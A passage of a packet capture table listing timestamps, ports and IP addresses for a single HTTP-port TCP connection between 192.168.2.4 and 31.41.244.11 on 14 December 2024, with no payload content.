Dec 14, 2024 23:58:11.956005096 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.956048012 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.956945896 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.957082033 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.957138062 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.958024025 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.958087921 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.958219051 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.958257914 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.959064007 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.959105968 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.959176064 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.959249020 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.960163116 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.960227966 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.960302114 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.960520029 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.961183071 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.961234093 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.961296082 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.961352110 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.962348938 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.962395906 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.962404966 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.963279963 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.963335037 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.963408947 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.963457108 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.964366913 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.964421988 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.964461088 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.964510918 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.965389013 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.965521097 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.965569019 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.966444016 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.966492891 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.966558933 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.966609001 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.967550993 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.967622042 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.967663050 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.967703104 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.968550920 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.968609095 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.968681097 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.968745947 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.969593048 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.969639063 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.969716072 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.969762087 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.970644951 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.970710993 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.970803976 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.970843077 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.971720934 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.971873999 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.971925020 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.972795963 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.972853899 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.972901106 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.972944021 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.973851919 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.973953962 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.974004030 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.974868059 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.974919081 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.975007057 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.975079060 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.975938082 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.975989103 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.976037025 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.976080894 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.976980925 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.977034092 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.977111101 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.977153063 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.978089094 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.978177071 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.978231907 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.979100943 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.979173899 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.979228020 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.979279041 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.980166912 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.980231047 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.980274916 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.980323076 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.981204033 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.981256962 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.981321096 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.981374025 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.982295036 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.982347012 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.982392073 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.982440948 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.983329058 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.983382940 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.983453035 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.983499050 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.984369993 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.984431982 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.984482050 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.984534979 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.985549927 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.985876083 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.985925913 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.986499071 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.986548901 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.986598015 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.986783028 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.987529993 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.987585068 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.125149012 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.125255108 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.125325918 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.125380993 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.125436068 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.125617981 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.125682116 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.126549959 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.126620054 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.126698017 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.126765013 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.127437115 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.127542019 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.127626896 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.128473043 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.128546000 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.128623962 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.128688097 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.129535913 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.129689932 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.129760981 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.130614996 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.130686045 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.130692005 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.130752087 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.131642103 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.131721973 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.131786108 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.131848097 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.132690907 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.132747889 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.132900000 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.132961988 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.133775949 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.133902073 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.133965969 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.134784937 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.134840012 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.134948015 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.135004044 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.135838985 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.135891914 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.135992050 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.136040926 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.136930943 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.136987925 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.137063980 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.137115002 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.138014078 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.138161898 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.138219118 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.139019012 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.139076948 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.139163017 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.139219999 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.140086889 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.140145063 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.140253067 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.140307903 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.141118050 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.141189098 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.141266108 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.141334057 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.142183065 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.142282009 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.142410994 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.143208981 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.143352032 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.143409967 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.143620014 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.144263983 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.144373894 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.144397974 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.144530058 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.145303011 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.145370007 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.145447016 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.145500898 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.146363974 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.146421909 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.146497965 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.146552086 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.147442102 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.147500992 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.147552013 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.147603989 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.148494005 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.148554087 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.148603916 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.148657084 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.149528980 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.149585009 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.149665117 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.149717093 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.150573969 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.150727987 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.150785923 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.151635885 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.151686907 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.151758909 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.151819944 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.152703047 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.152832031 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.152888060 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.153758049 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.153887033 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.153947115 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.154963017 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.155402899 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.155463934 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.155924082 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.155982018 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.156140089 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.156196117 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.156924963 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.156986952 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.157047987 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.157102108 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.157985926 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.158135891 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.158195019 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.159035921 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.159094095 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.159168959 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.159225941 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.160111904 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.160166979 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.160211086 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.160264969 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.161123991 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.161180019 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.161259890 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.161308050 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.162189960 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.162333012 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.162394047 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.163258076 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.163320065 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.163362980 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.163420916 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.164490938 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.164544106 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.164731026 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.164791107 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.165406942 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.165458918 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.165812016 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.165863991 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.166410923 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.166542053 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.166558981 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.166589975 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.167474985 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.167525053 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.167582035 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.167645931 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.168590069 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.168654919 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.168658972 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.168704987 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.169624090 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.169675112 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.169718027 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.169769049 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.170631886 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.170690060 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.170762062 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.170815945 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.171730042 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.171781063 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.171814919 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.171874046 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.172764063 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.172813892 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.172854900 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.172902107 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.173883915 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.173933983 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.173940897 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.174000025 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.174868107 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.174925089 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.174962997 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.175087929 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.175914049 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.176017046 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.176070929 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.176950932 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.177119017 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.177176952 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.178092003 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.178160906 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.178221941 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.179075003 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.179130077 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.179179907 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.179234028 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.180084944 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.180133104 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.316979885 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.317087889 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.317152977 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.317433119 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.317663908 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.317720890 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.317770004 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.317814112 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.318734884 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.318842888 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.318897009 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.319789886 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.319849968 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.319890022 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.319938898 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.320816994 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.320873022 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.320954084 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.321008921 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.321902037 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.322016001 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.322069883 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.322921038 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.322974920 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.323056936 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.323111057 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:12.323982000 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:12.324037075 CET	49770	80	192.168.2.4	31.41.244.11
